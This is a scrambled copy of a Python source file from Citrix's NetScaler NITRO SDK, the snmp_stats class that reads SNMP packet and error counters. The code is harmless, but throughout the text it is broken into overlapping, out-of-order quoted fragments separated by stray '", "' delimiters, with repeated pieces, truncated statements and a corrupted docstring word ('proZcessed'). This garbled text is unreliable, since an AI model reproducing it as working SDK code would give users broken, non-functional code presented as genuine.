result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode,", "which used an SNMP community name not known to the NetScaler.\"\"\" try :", "as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped", "as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have", "expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception as e: raise e", "e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into object", "base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util", "Exception as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total number of", "\"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e:", "except Exception as e: raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\"", "self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs", "the specific language governing permissions and # limitations under the License. # from", "used an SNMP community name not known to the NetScaler.\"\"\" try : return", "Exception as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were", "not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e:", "authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as e: raise", "# # Copyright (c) 2008-2015 Citrix Systems, Inc. 
# # Licensed under the", "raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try :", "an SNMP engine ID that was not known to the NetScaler.\"\"\" try :", "def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they appeared outside of", "# limitations under the License. # from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import", "if result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else", "result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444)", ": return self._snmptottraps except Exception as e: raise e @property def snmptotbadversions(self) :", "raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they", "snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e: raise e @property def", "that are configured on netscaler. 
:param service: :param name: (Default value = \"\")", "def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except", "return self._snmptotresponses except Exception as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The", "self._snmptotgetreqs except Exception as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s)", "number of SNMP Messages received that represented an SNMP operation which was not", "e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return", "was not known to the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception", ": \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as", "(result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") :", "statistics of all snmp_stats resources that are configured on netscaler. :param service: :param", "def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they did not contain", "@property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception", "contain the expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception as e:", "\"License\") # you may not use this file except in compliance with the", "for the specific language governing permissions and # limitations under the License. 
#", "self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs", "raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted", "Get-Request PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetreqs except", "\"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode = 0 self.message =", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "@property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception", "Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were", ": return self._snmpresponsesrate except Exception as e: raise e @property def snmpgetreqsrate(self) :", "raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated", ": return self._snmpgetbulkreqsrate except Exception as e: raise e @property def snmpnotintimewindow(self) :", "return 0 except Exception as e : raise e @classmethod def get(cls, service,", ": \"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\" try : return", ": if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise", "not contain the expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception as", "def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated by the NetScaler.\"\"\"", "PDUs that have been generated by the NetScaler.\"\"\" try : return self._snmptottraps except", "into object and returns the object array in case of get request. 
:param", "@property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\"", "0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0", "# # Unless required by applicable law or agreed to in writing, software", "snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP community name not known", "raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they", "or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e: raise", "express or implied. # See the License for the specific language governing permissions", "def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except", "response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if", ": \"\"\" \"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode = 0", "snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception as e:", "self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions", "from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class", "as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP", "def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as", "self.errorcode = 0 self.message = \"\" self.severity = \"\" self.sessionid = \"\" self.snmp", "@clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param clearstats: \"\"\"", "SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as e: 
raise e", "if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity == \"ERROR\")", "either express or implied. # See the License for the specific language governing", "engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as e: raise e @property", ": return self._snmptotgetreqs except Exception as e: raise e @property def snmprxpktsrate(self) :", "except Exception as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter", "return self._snmpgetreqsrate except Exception as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP", "e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except", "return self._snmpwrongdigests except Exception as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate", "(/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e: raise", "\"\"\"SNMP packets that were dropped because they did not contain the expected digest", "appeared outside of the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except", "= service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444) :", "return self._snmptoterrreqdropped except Exception as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER", "full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp", "self._clearstats except Exception as e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear", "_get_nitro_response(self, service, response) : \"\"\"converts nitro response into object and returns the object", 
"self._clearstats = clearstats except Exception as e: raise e @property def snmpdecryptionerrors(self) :", "nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception", "self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate", "def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except", "nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource)", "the NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as", "try : return self._snmpgetreqsrate except Exception as e: raise e @property def snmptotbadcommname(self)", "\"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0", ": return self._snmptxpktsrate except Exception as e: raise e @property def snmpresponsesrate(self) :", "try : return self._snmptotbadcommname except Exception as e: raise e @property def snmptotgetnextreqs(self)", "self._snmptoterrreqdropped except Exception as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s)", "def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as", "self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) :", "0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0", "[] self.errorcode = 0 self.message = \"\" self.severity = \"\" self.sessionid = \"\"", "snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated by the NetScaler.\"\"\" try", "the License. 
# from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options", "the License. # You may obtain a copy of the License at #", "specific language governing permissions and # limitations under the License. # from nitro.resource.base.base_resource", "= \"\") \"\"\" try : obj = snmp_stats() if not name : response", "\"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0", "SNMP engine ID that was not known to the NetScaler.\"\"\" try : return", "e @property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received that", "dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e: raise e @property def", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception", "that have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as", ": \"\"\"The total number of SNMP Messages received that represented an SNMP operation", "return self._snmpunknownusername except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP", "@classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch the", "e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except", "= 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs =", "a user that was not known to the SNMP engine.\"\"\" try : return", "def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into object and returns the", 
"@property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate", "= 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors =", ": return self._snmptottxpkts except Exception as e: raise e @property def snmptotparseerrs(self) :", "were dropped because they referenced a user that was not known to the", "raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try :", "0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0", "self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values", "nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats =", "0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0", "response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) :", ": self.snmp = [] self.errorcode = 0 self.message = \"\" self.severity = \"\"", "security level that was unknown to the NetScaler or otherwise unavailable. \"\"\" try", "as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\"", "Inc. # # Licensed under the Apache License, Version 2.0 (the \"License\") #", "self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors", "nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) :", "governing permissions and # limitations under the License. 
# from nitro.resource.base.base_resource import base_resource", "@property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\"", "from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options from", "\"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return", "obj.stat_resources(service, option_) return response except Exception as e: raise e class Clearstats: \"\"\"", "counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e: raise e", "case of get request. :param service: :param response: \"\"\" try : result =", "\"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetreqs", "were dropped because they requested a security level that was unknown to the", "Citrix Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the", "unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as e: raise e", "for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e: raise e @property", ": return self._snmptotgetbulkreqs except Exception as e: raise e @property def snmpunknownusername(self) :", "e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because", "Exception as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that", "with the License. 
# You may obtain a copy of the License at", "self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow", "the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as e:", "e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try", "@property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\"", "snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they did not contain the", "= \"\" self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats() for _", "decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e: raise e @property def", "of SNMP Messages received that represented an SNMP operation which was not allowed", ": \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as", "as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have", "to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e: raise e", "identifier argument\"\"\" try : return 0 except Exception as e : raise e", "decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e: raise", "raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated", "SNMP operation which was not allowed by the SNMP community named in the", "snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\" try :", "SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as e: raise e @property", ": \"\"\"SNMP packets that were dropped because they referenced a user that was", "@property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\"", "self._snmpgetreqsrate 
except Exception as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages", ": \"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\" try : return", "\"\"\"Number of ASN.1 or BER errors encountered when decoding received SNMP Messages.\"\"\" try", "because they requested a security level that was unknown to the NetScaler or", "e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response)", "the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e: raise e @property", "value = \"\") :param option_: (Default value = \"\") \"\"\" try : obj", "@property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated by the", "clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try :", "def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try", "law or agreed to in writing, software # distributed under the License is", "try : obj = snmp_stats() if not name : response = obj.stat_resources(service, option_)", "the License for the specific language governing permissions and # limitations under the", "@property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they appeared outside", "def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they referenced a user", "snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception", "snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they referenced a user that", "received, which used an SNMP community name not known to the NetScaler.\"\"\" try", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "= 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername =", "messages received, 
which were for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions", "Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the \"License\")", "Trap PDUs that have been generated by the NetScaler.\"\"\" try : return self._snmptottraps", "try : return self._snmptoterrreqdropped except Exception as e: raise e @property def snmpgetnextreqsrate(self)", "self._snmptxpktsrate except Exception as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s)", "to the NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception", "e: raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\"", "= 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate =", "snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e: raise e @property def", "= 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname =", "raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts", "_get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\" try : return 0", "counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e: raise e", "Exception as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which", "if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode,", "str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e", "/ counters :param clearstats: \"\"\" try : self._clearstats = clearstats except Exception as", "self._snmptotbadcommuse except Exception as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP 
requests", ": \"\"\"SNMP Trap PDUs that have been generated by the NetScaler.\"\"\" try :", "snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try :", "self._snmptotgetbulkreqs except Exception as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets", "been generated by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e:", "self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the statsistics", ": return self._snmpnotintimewindow except Exception as e: raise e @property def snmptotgetbulkreqs(self) :", "dropped because they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception", "return self._snmptotrxpkts except Exception as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP", "were dropped because they did not contain the expected digest value.\"\"\" try :", "try : return self._snmptotgetbulkreqs except Exception as e: raise e @property def snmpunknownusername(self)", "!= 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity : if", "e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been", ": obj = snmp_stats() if not name : response = obj.stat_resources(service, option_) return", "in compliance with the License. # You may obtain a copy of the", "encountered when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "name=\"\", option_=\"\") : \"\"\"Use this API to fetch the statistics of all snmp_stats", ": \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception as e: raise", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
#", "self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts", "e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been", "self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate", "SNMP Messages received that represented an SNMP operation which was not allowed by", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "try : return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def snmptotgetreqs(self)", "self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername", "return self._snmptxpktsrate except Exception as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate", "as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped", "return result.snmp except Exception as e : raise e def _get_object_name(self) : \"\"\"Returns", "in case of get request. 
:param service: :param response: \"\"\" try : result", "import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self)", "Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except", "generated by the NetScaler.\"\"\" try : return self._snmptottraps except Exception as e: raise", "See the License for the specific language governing permissions and # limitations under", "were dropped because they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception as e: raise e", "Exception as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that", "str(result.message), str(result.severity)) return result.snmp except Exception as e : raise e def _get_object_name(self)", "Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\"", "of object identifier argument\"\"\" try : return 0 except Exception as e :", "represented an SNMP operation which was not allowed by the SNMP community named", "language governing permissions and # limitations under the License. 
# from nitro.resource.base.base_resource import", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "self._snmptotbadcommname except Exception as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next", "except Exception as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter", "as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\"", "processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e: raise e @property def", "\"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e: raise e", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try", "because they appeared outside of the authoritative SNMP engine's window.\"\"\" try : return", "snmp_stats resources that are configured on netscaler. :param service: :param name: (Default value", "return self._snmptotbadcommname except Exception as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP", "operation which was not allowed by the SNMP community named in the Message.\"\"\"", "e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they requested", "# Copyright (c) 2008-2015 Citrix Systems, Inc. 
# # Licensed under the Apache", "e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted and", "basic = \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self,", ": \"\"\"Number of SNMP messages received, which were for an unsupported SNMP version.\"\"\"", "except Exception as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter", "obj = snmp_stats() if not name : response = obj.stat_resources(service, option_) return response", "except Exception as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\"", "Exception as e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that", "raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they", "and processed.\"\"\" try : return self._snmptotgetreqs except Exception as e: raise e @property", "nitro response into object and returns the object array in case of get", "if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity :", "try : return self._snmptotgetreqs except Exception as e: raise e @property def snmprxpktsrate(self)", "\"\"\"SNMP packets that were dropped because they could not be decrypted.\"\"\" try :", "snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered when decoding received SNMP", "@property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they did not", ": return self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self, service, response)", "import base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import", "nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception", 
"self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate", "counters :param clearstats: \"\"\" try : self._clearstats = clearstats except Exception as e:", "# # Licensed under the Apache License, Version 2.0 (the \"License\") # you", "import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) :", "\"\"\"Use this API to fetch the statistics of all snmp_stats resources that are", "Exception as e: raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full", "import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception import", "try : return self._snmptotgetnextreqs except Exception as e: raise e @property def snmpunknownengineids(self)", "because they did not contain the expected digest value.\"\"\" try : return self._snmpwrongdigests", "response except Exception as e: raise e class Clearstats: \"\"\" \"\"\" basic =", "for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e: raise e @property", "of SNMP messages received, which were for an unsupported SNMP version.\"\"\" try :", "return self._snmptottraps except Exception as e: raise e @property def snmptotbadversions(self) : \"\"\"Number", "generated by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e: raise", "self.snmp = [] self.errorcode = 0 self.message = \"\" self.severity = \"\" self.sessionid", "self._snmptotbadversions except Exception as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s)", "as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have", "\"\"\" \"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\"", "def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP 
community name not", "@property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they referenced an", "raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts", "\"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if", "except in compliance with the License. # You may obtain a copy of", "return self._snmpgetbulkreqsrate except Exception as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP", "0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0", "raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\" class", "snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e:", "nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util", "self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate", "the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e: raise e @property", "@property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate", "object identifier argument\"\"\" try : return 0 except Exception as e : raise", "not known to the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as", "/ counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats except Exception as", "counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e: raise e", "NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e: raise e @property def", "from 
